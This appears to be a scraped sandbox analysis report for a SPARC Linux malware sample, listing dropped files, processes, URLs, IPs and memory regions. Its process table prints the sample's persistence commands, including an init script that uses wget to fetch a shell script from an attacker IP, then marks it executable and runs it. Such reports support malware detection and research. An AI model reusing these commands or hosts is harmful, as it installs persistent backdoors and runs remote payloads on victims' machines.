Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
sparc.nn.elf
|
ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/sparc.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/run/user/127/dconf/user
|
very short file (no magic)
|
dropped
|
||
|
/tmp/qemu-open.mZyJCQ (deleted)
|
data
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/sparc.nn.elf
|
/tmp/sparc.nn.elf
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sparc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sparc.nn.elf'\n
/tmp/sparc.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n
stop)\n echo 'Stopping sparc.nn.elf'\n killall sparc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n
*)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sparc.nn.elf"
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/sparc.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/sparc.nn.elf
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 45 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/oro1vk/sbin/reboot/usr/sbin/reboot/bin/reboot/usr/bin/reboot/sbin/shutdown/usr/s
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
150.2.160.238
|
unknown
|
Japan
|
||
|
179.73.44.144
|
unknown
|
Brazil
|
||
|
150.192.208.87
|
unknown
|
United States
|
||
|
178.166.29.47
|
unknown
|
Portugal
|
||
|
160.240.171.228
|
unknown
|
Japan
|
||
|
82.226.0.47
|
unknown
|
France
|
||
|
150.27.252.177
|
unknown
|
Japan
|
||
|
92.117.94.163
|
unknown
|
Germany
|
||
|
69.67.136.95
|
unknown
|
United States
|
||
|
154.62.174.33
|
unknown
|
United States
|
||
|
30.125.52.29
|
unknown
|
United States
|
||
|
171.230.90.188
|
unknown
|
Viet Nam
|
||
|
68.136.209.138
|
unknown
|
United States
|
||
|
82.229.252.184
|
unknown
|
France
|
||
|
17.211.218.191
|
unknown
|
United States
|
||
|
102.187.76.138
|
unknown
|
Egypt
|
||
|
172.14.81.87
|
unknown
|
United States
|
||
|
60.223.37.204
|
unknown
|
China
|
||
|
24.128.178.219
|
unknown
|
United States
|
||
|
51.3.107.42
|
unknown
|
United States
|
||
|
87.212.86.45
|
unknown
|
Netherlands
|
||
|
187.193.242.46
|
unknown
|
Mexico
|
||
|
176.217.158.41
|
unknown
|
Turkey
|
||
|
26.239.223.124
|
unknown
|
United States
|
||
|
105.80.23.188
|
unknown
|
Egypt
|
||
|
18.206.13.133
|
unknown
|
United States
|
||
|
125.73.206.30
|
unknown
|
China
|
||
|
130.222.69.184
|
unknown
|
United States
|
||
|
79.187.93.10
|
unknown
|
Poland
|
||
|
49.198.111.129
|
unknown
|
Australia
|
||
|
179.199.7.106
|
unknown
|
Brazil
|
||
|
38.194.86.107
|
unknown
|
United States
|
||
|
114.249.9.96
|
unknown
|
China
|
||
|
184.238.141.104
|
unknown
|
United States
|
||
|
211.228.252.92
|
unknown
|
Korea Republic of
|
||
|
7.159.26.128
|
unknown
|
United States
|
||
|
175.246.78.222
|
unknown
|
Korea Republic of
|
||
|
34.92.76.126
|
unknown
|
United States
|
||
|
157.95.204.167
|
unknown
|
United States
|
||
|
85.23.180.68
|
unknown
|
Finland
|
||
|
7.209.131.174
|
unknown
|
United States
|
||
|
183.107.135.114
|
unknown
|
Korea Republic of
|
||
|
193.13.27.143
|
unknown
|
Sweden
|
||
|
140.0.187.13
|
unknown
|
Indonesia
|
||
|
200.2.4.84
|
unknown
|
Chile
|
||
|
167.92.222.27
|
unknown
|
Canada
|
||
|
70.110.244.60
|
unknown
|
United States
|
||
|
156.239.44.232
|
unknown
|
Seychelles
|
||
|
118.205.141.20
|
unknown
|
China
|
||
|
86.251.38.201
|
unknown
|
France
|
||
|
144.154.20.223
|
unknown
|
United States
|
||
|
69.137.221.72
|
unknown
|
United States
|
||
|
190.126.161.54
|
unknown
|
Colombia
|
||
|
16.112.211.160
|
unknown
|
United States
|
||
|
134.34.64.242
|
unknown
|
Germany
|
||
|
207.88.170.183
|
unknown
|
United States
|
||
|
137.10.244.191
|
unknown
|
United States
|
||
|
83.114.185.39
|
unknown
|
France
|
||
|
108.132.57.211
|
unknown
|
United States
|
||
|
180.178.35.253
|
unknown
|
Hong Kong
|
||
|
56.38.180.232
|
unknown
|
United States
|
||
|
179.235.228.205
|
unknown
|
Brazil
|
||
|
141.201.89.49
|
unknown
|
Austria
|
||
|
145.167.227.97
|
unknown
|
Netherlands
|
||
|
5.160.190.93
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
200.46.209.162
|
unknown
|
Panama
|
||
|
12.157.196.151
|
unknown
|
United States
|
||
|
103.78.120.25
|
unknown
|
United States
|
||
|
86.58.239.73
|
unknown
|
Denmark
|
||
|
140.176.239.21
|
unknown
|
United States
|
||
|
28.202.214.161
|
unknown
|
United States
|
||
|
68.87.233.137
|
unknown
|
United States
|
||
|
105.33.232.180
|
unknown
|
Egypt
|
||
|
143.164.202.72
|
unknown
|
Germany
|
||
|
158.204.94.110
|
unknown
|
Japan
|
||
|
45.228.118.72
|
unknown
|
Brazil
|
||
|
139.190.98.22
|
unknown
|
Pakistan
|
||
|
102.212.223.143
|
unknown
|
unknown
|
||
|
201.81.230.233
|
unknown
|
Brazil
|
||
|
214.23.245.48
|
unknown
|
United States
|
||
|
215.97.83.219
|
unknown
|
United States
|
||
|
143.227.72.209
|
unknown
|
United States
|
||
|
219.186.119.36
|
unknown
|
Japan
|
||
|
123.28.58.156
|
unknown
|
Viet Nam
|
||
|
108.108.146.41
|
unknown
|
United States
|
||
|
2.200.121.166
|
unknown
|
Germany
|
||
|
38.85.133.234
|
unknown
|
United States
|
||
|
65.154.38.107
|
unknown
|
United States
|
||
|
126.136.230.47
|
unknown
|
Japan
|
||
|
167.146.251.153
|
unknown
|
United States
|
||
|
181.122.86.111
|
unknown
|
Paraguay
|
||
|
35.248.242.23
|
unknown
|
United States
|
||
|
153.210.4.3
|
unknown
|
Japan
|
||
|
158.4.116.61
|
unknown
|
United States
|
||
|
196.169.98.106
|
unknown
|
Togo
|
||
|
59.158.171.53
|
unknown
|
Japan
|
||
|
133.151.173.71
|
unknown
|
Japan
|
||
|
25.60.59.173
|
unknown
|
United Kingdom
|
||
|
80.132.249.136
|
unknown
|
Germany
|
||
|
18.243.54.8
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f26c002d000
|
page execute read
|
|
||
|
7f26c002d000
|
page execute read
|
|
||
|
55fdfc1de000
|
page read and write
|
|||
|
7f27c8e37000
|
page read and write
|
|||
|
7f27c8ac7000
|
page read and write
|
|||
|
55fdfc1c7000
|
page execute and read and write
|
|||
|
55fdfd875000
|
page read and write
|
|||
|
7f26c003e000
|
page read and write
|
|||
|
7f26c0042000
|
page read and write
|
|||
|
55fdf9f92000
|
page execute read
|
|||
|
7ffed87f6000
|
page execute read
|
|||
|
55fdfa1c9000
|
page read and write
|
|||
|
55fdfc1de000
|
page read and write
|
|||
|
7ffed87be000
|
page read and write
|
|||
|
7f27c8fad000
|
page read and write
|
|||
|
7f27c8705000
|
page read and write
|
|||
|
55fdfd875000
|
page read and write
|
|||
|
7ffed87f6000
|
page execute read
|
|||
|
7f27c8e37000
|
page read and write
|
|||
|
7f27c8f60000
|
page read and write
|
|||
|
7f27c0021000
|
page read and write
|
|||
|
7f26c0047000
|
page read and write
|
|||
|
7f27c0000000
|
page read and write
|
|||
|
55fdfc1c7000
|
page execute and read and write
|
|||
|
55fdfa1c9000
|
page read and write
|
|||
|
7f27c8468000
|
page read and write
|
|||
|
7f27c8705000
|
page read and write
|
|||
|
7f27c0021000
|
page read and write
|
|||
|
7f27c8468000
|
page read and write
|
|||
|
7f27c8ac7000
|
page read and write
|
|||
|
7f27c8476000
|
page read and write
|
|||
|
7f27c8f60000
|
page read and write
|
|||
|
7f27c8fad000
|
page read and write
|
|||
|
7f27c8aec000
|
page read and write
|
|||
|
7f27c7c65000
|
page read and write
|
|||
|
7f26c0042000
|
page read and write
|
|||
|
55fdfa1c0000
|
page read and write
|
|||
|
55fdf9f92000
|
page execute read
|
|||
|
7f26c003e000
|
page read and write
|
|||
|
7f27c0000000
|
page read and write
|
|||
|
7f27c8aec000
|
page read and write
|
|||
|
7ffed87be000
|
page read and write
|
|||
|
55fdfa1c0000
|
page read and write
|
|||
|
7f27c8f68000
|
page read and write
|
|||
|
7f27c7c65000
|
page read and write
|
|||
|
7f27c8f68000
|
page read and write
|
|||
|
7f27c8476000
|
page read and write
|
There are 37 hidden memdumps, click here to show them.